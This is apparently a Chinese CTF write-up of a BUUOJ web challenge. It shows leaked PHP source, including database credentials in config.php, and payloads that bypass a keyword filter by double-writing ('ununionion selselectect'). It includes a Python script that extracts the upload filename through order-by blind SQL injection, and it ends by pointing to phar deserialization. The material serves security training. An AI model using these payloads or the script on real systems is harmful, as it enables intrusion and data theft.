首先就一个登陆和注册。没注入。
进去以后URL如下<a href="http://node3.buuoj.cn/index.php?file=index">http://node3.buuoj.cn/index.php?file=index</a>
试了一下伪协议,没读到源码。注册登录发现有一个下载图片。将ID改成2报错,猜测是从数据库里提取数据
union select 下载不下来,报错,双写绕过了
‘
然后就是把所有源码扒下来了
index.php
<?php define("DIR_PERMITION",time()); include("config.php"); $_POST = d_addslashes($_POST); $_GET = d_addslashes($_GET); ?>
<?php $file = isset($_GET['file'])?$_GET['file']:"home"; // echo $file; if(preg_match('/\.\.|^[\s]*\/|^[\s]*php:|filter/i',$file)){ echo "<div class=\"msg error\" id=\"message\"> <i class=\"fa fa-exclamation-triangle\"></i>Attack Detected!</div>"; die(); } $filename = $file.".php"; if(!include($filename)){ if(!isset($_SESSION['username'])||!isset($_SESSION['userid'])){ header("Location: index.php?file=login"); die(); }
这里过滤了伪协议
config.php
<?php error_reporting(0); session_start(); $dbhost = "127.0.0.1"; $dbuser = "admin"; $dbpass = "password987~!@"; $dbname = "dsqli"; $conn = mysqli_connect($dbhost,$dbuser,$dbpass,$dbname); $conn ->query("set names utf8"); function d_addslashes($array){ foreach($array as $key=>$value){ if(!is_array($value)){ !get_magic_quotes_gpc()&&$value=addslashes($value); $array[$key]=$value; }else{ $array[$key] = d_addslashes($array[$key]); } } return $array; } function filter($id){ $id = strtolower($id); $id = str_replace('select', '', $id); $id = str_replace('update', '', $id); $id = str_replace('insert', '', $id); $id = str_replace('delete', '', $id); $id = str_replace('and', '', $id); $id = str_replace('or', '', $id); $id = str_replace('where', '', $id); $id = str_replace('union', '', $id); $id = str_replace('like', '', $id); $id = str_replace('regexp', '', $id); $id = str_replace('is', '', $id); $id = str_replace('=', '', $id); $id = str_replace(',', '', $id); $id = str_replace('|', '', $id); $id = str_replace('&', '', $id); $id = str_replace('!', '', $id); $id = str_replace('%', '', $id); $id = str_replace('^', '', $id); $id = str_replace('<', '', $id); $id = str_replace('>', '', $id); $id = str_replace('*', '', $id); $id = str_replace('(', '', $id); $id = str_replace(')', '', $id); return $id ; } function random_str($length = "32") { $set = array("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m","n", "o", "p", "q", "r","s","t","u","v", "w","x", "y","z","1", "2", "3", "4", "5", "6", "7", "8", "9"); $str = ''; for ($i = 1; $i <= $length; ++$i) { $ch = mt_rand(0, count($set) - 1); $str .= $set[$ch]; } return $str; }
发现都是替换为空。但是这里符号都被过滤了
<?php defined("DIR_PERMITION") or die("Access denied!"); if(!isset($_SESSION['username'])||!isset($_SESSION['userid'])){ header("Location: index.php?file=login"); die(); } ?> <?php if (isset($_FILES['file'])) { $seed = rand(0,getrandmax()); mt_srand($seed); if ($_FILES["file"]["error"] > 0) { echo "<div class=\"msg error\" id=\"message\"> <i class=\"fa fa-exclamation-triangle\">uplpad file error!:".$_FILES["file"]["error"]."</i></div>"; die(); } $fileTypeCheck = ((($_FILES["file"]["type"] == "image/gif") || ($_FILES["file"]["type"] == "image/jpeg") || ($_FILES["file"]["type"] == "image/pjpeg") || ($_FILES["file"]["type"] == "image/png")) && ($_FILES["file"]["size"] < 204800)); $reg='/^gif|jpg|jpeg|png$/'; $fileExtensionCheck=!preg_match($reg,pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION)); if($fileExtensionCheck){ die("Only upload image file!"); } if($fileTypeCheck){ $fileOldName = addslashes(pathinfo($_FILES['file']['name'],PATHINFO_FILENAME)); $fileNewName = './Up10aDs/' . random_str() .'.'.pathinfo($_FILES['file']['name'],PATHINFO_EXTENSION); $userid = $_SESSION['userid']; $sql= "insert intodownload
(uid
,image_name
,location
) values ($userid,'$fileOldName','$fileNewName')"; $res = $conn ->query($sql); if($res&&move_uploaded_file($_FILES['file']['tmp_name'], $fileNewName)){ echo "<script>alert('file upload success!');window.location.href='index.php?file=home'</script>"; }else{ echo "<script>alert('file upload error')</script>"; } }else{ echo "<script>alert('file type error');</script>"; } } ?>
首先检查文件类型和后缀名。然后文件重命名为/Up10aDS/random_str().jpg
插入数据库。数据库结构为uid,image_name,location
那么我们需要得到这个文件名
我们可以根据order by 注入注入出文件名
import requests proxies={'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'} url='http://121.36.104.216:10091/downfile.php' cookie={"Cookie":"PHPSESSID=1b200f7ghvjujoep08vamco280"} name='0x2e2f557031306144732f' r=requests.session() for a in range(200): for i in range(30,130): data={"image":"4 ununionion selselectect "+name+hex(i)[2:]+" oorrder by 1", "image_download":"%E6%94%B6%E8%97%8F"} result=r.post(url=url,data=data,headers=cookie,proxies=proxies).text #print (result) if 'eval' in result: name+=hex(i-1)[2:] print(chr(i-1)) break
注入出文件名,使用phar协议一把梭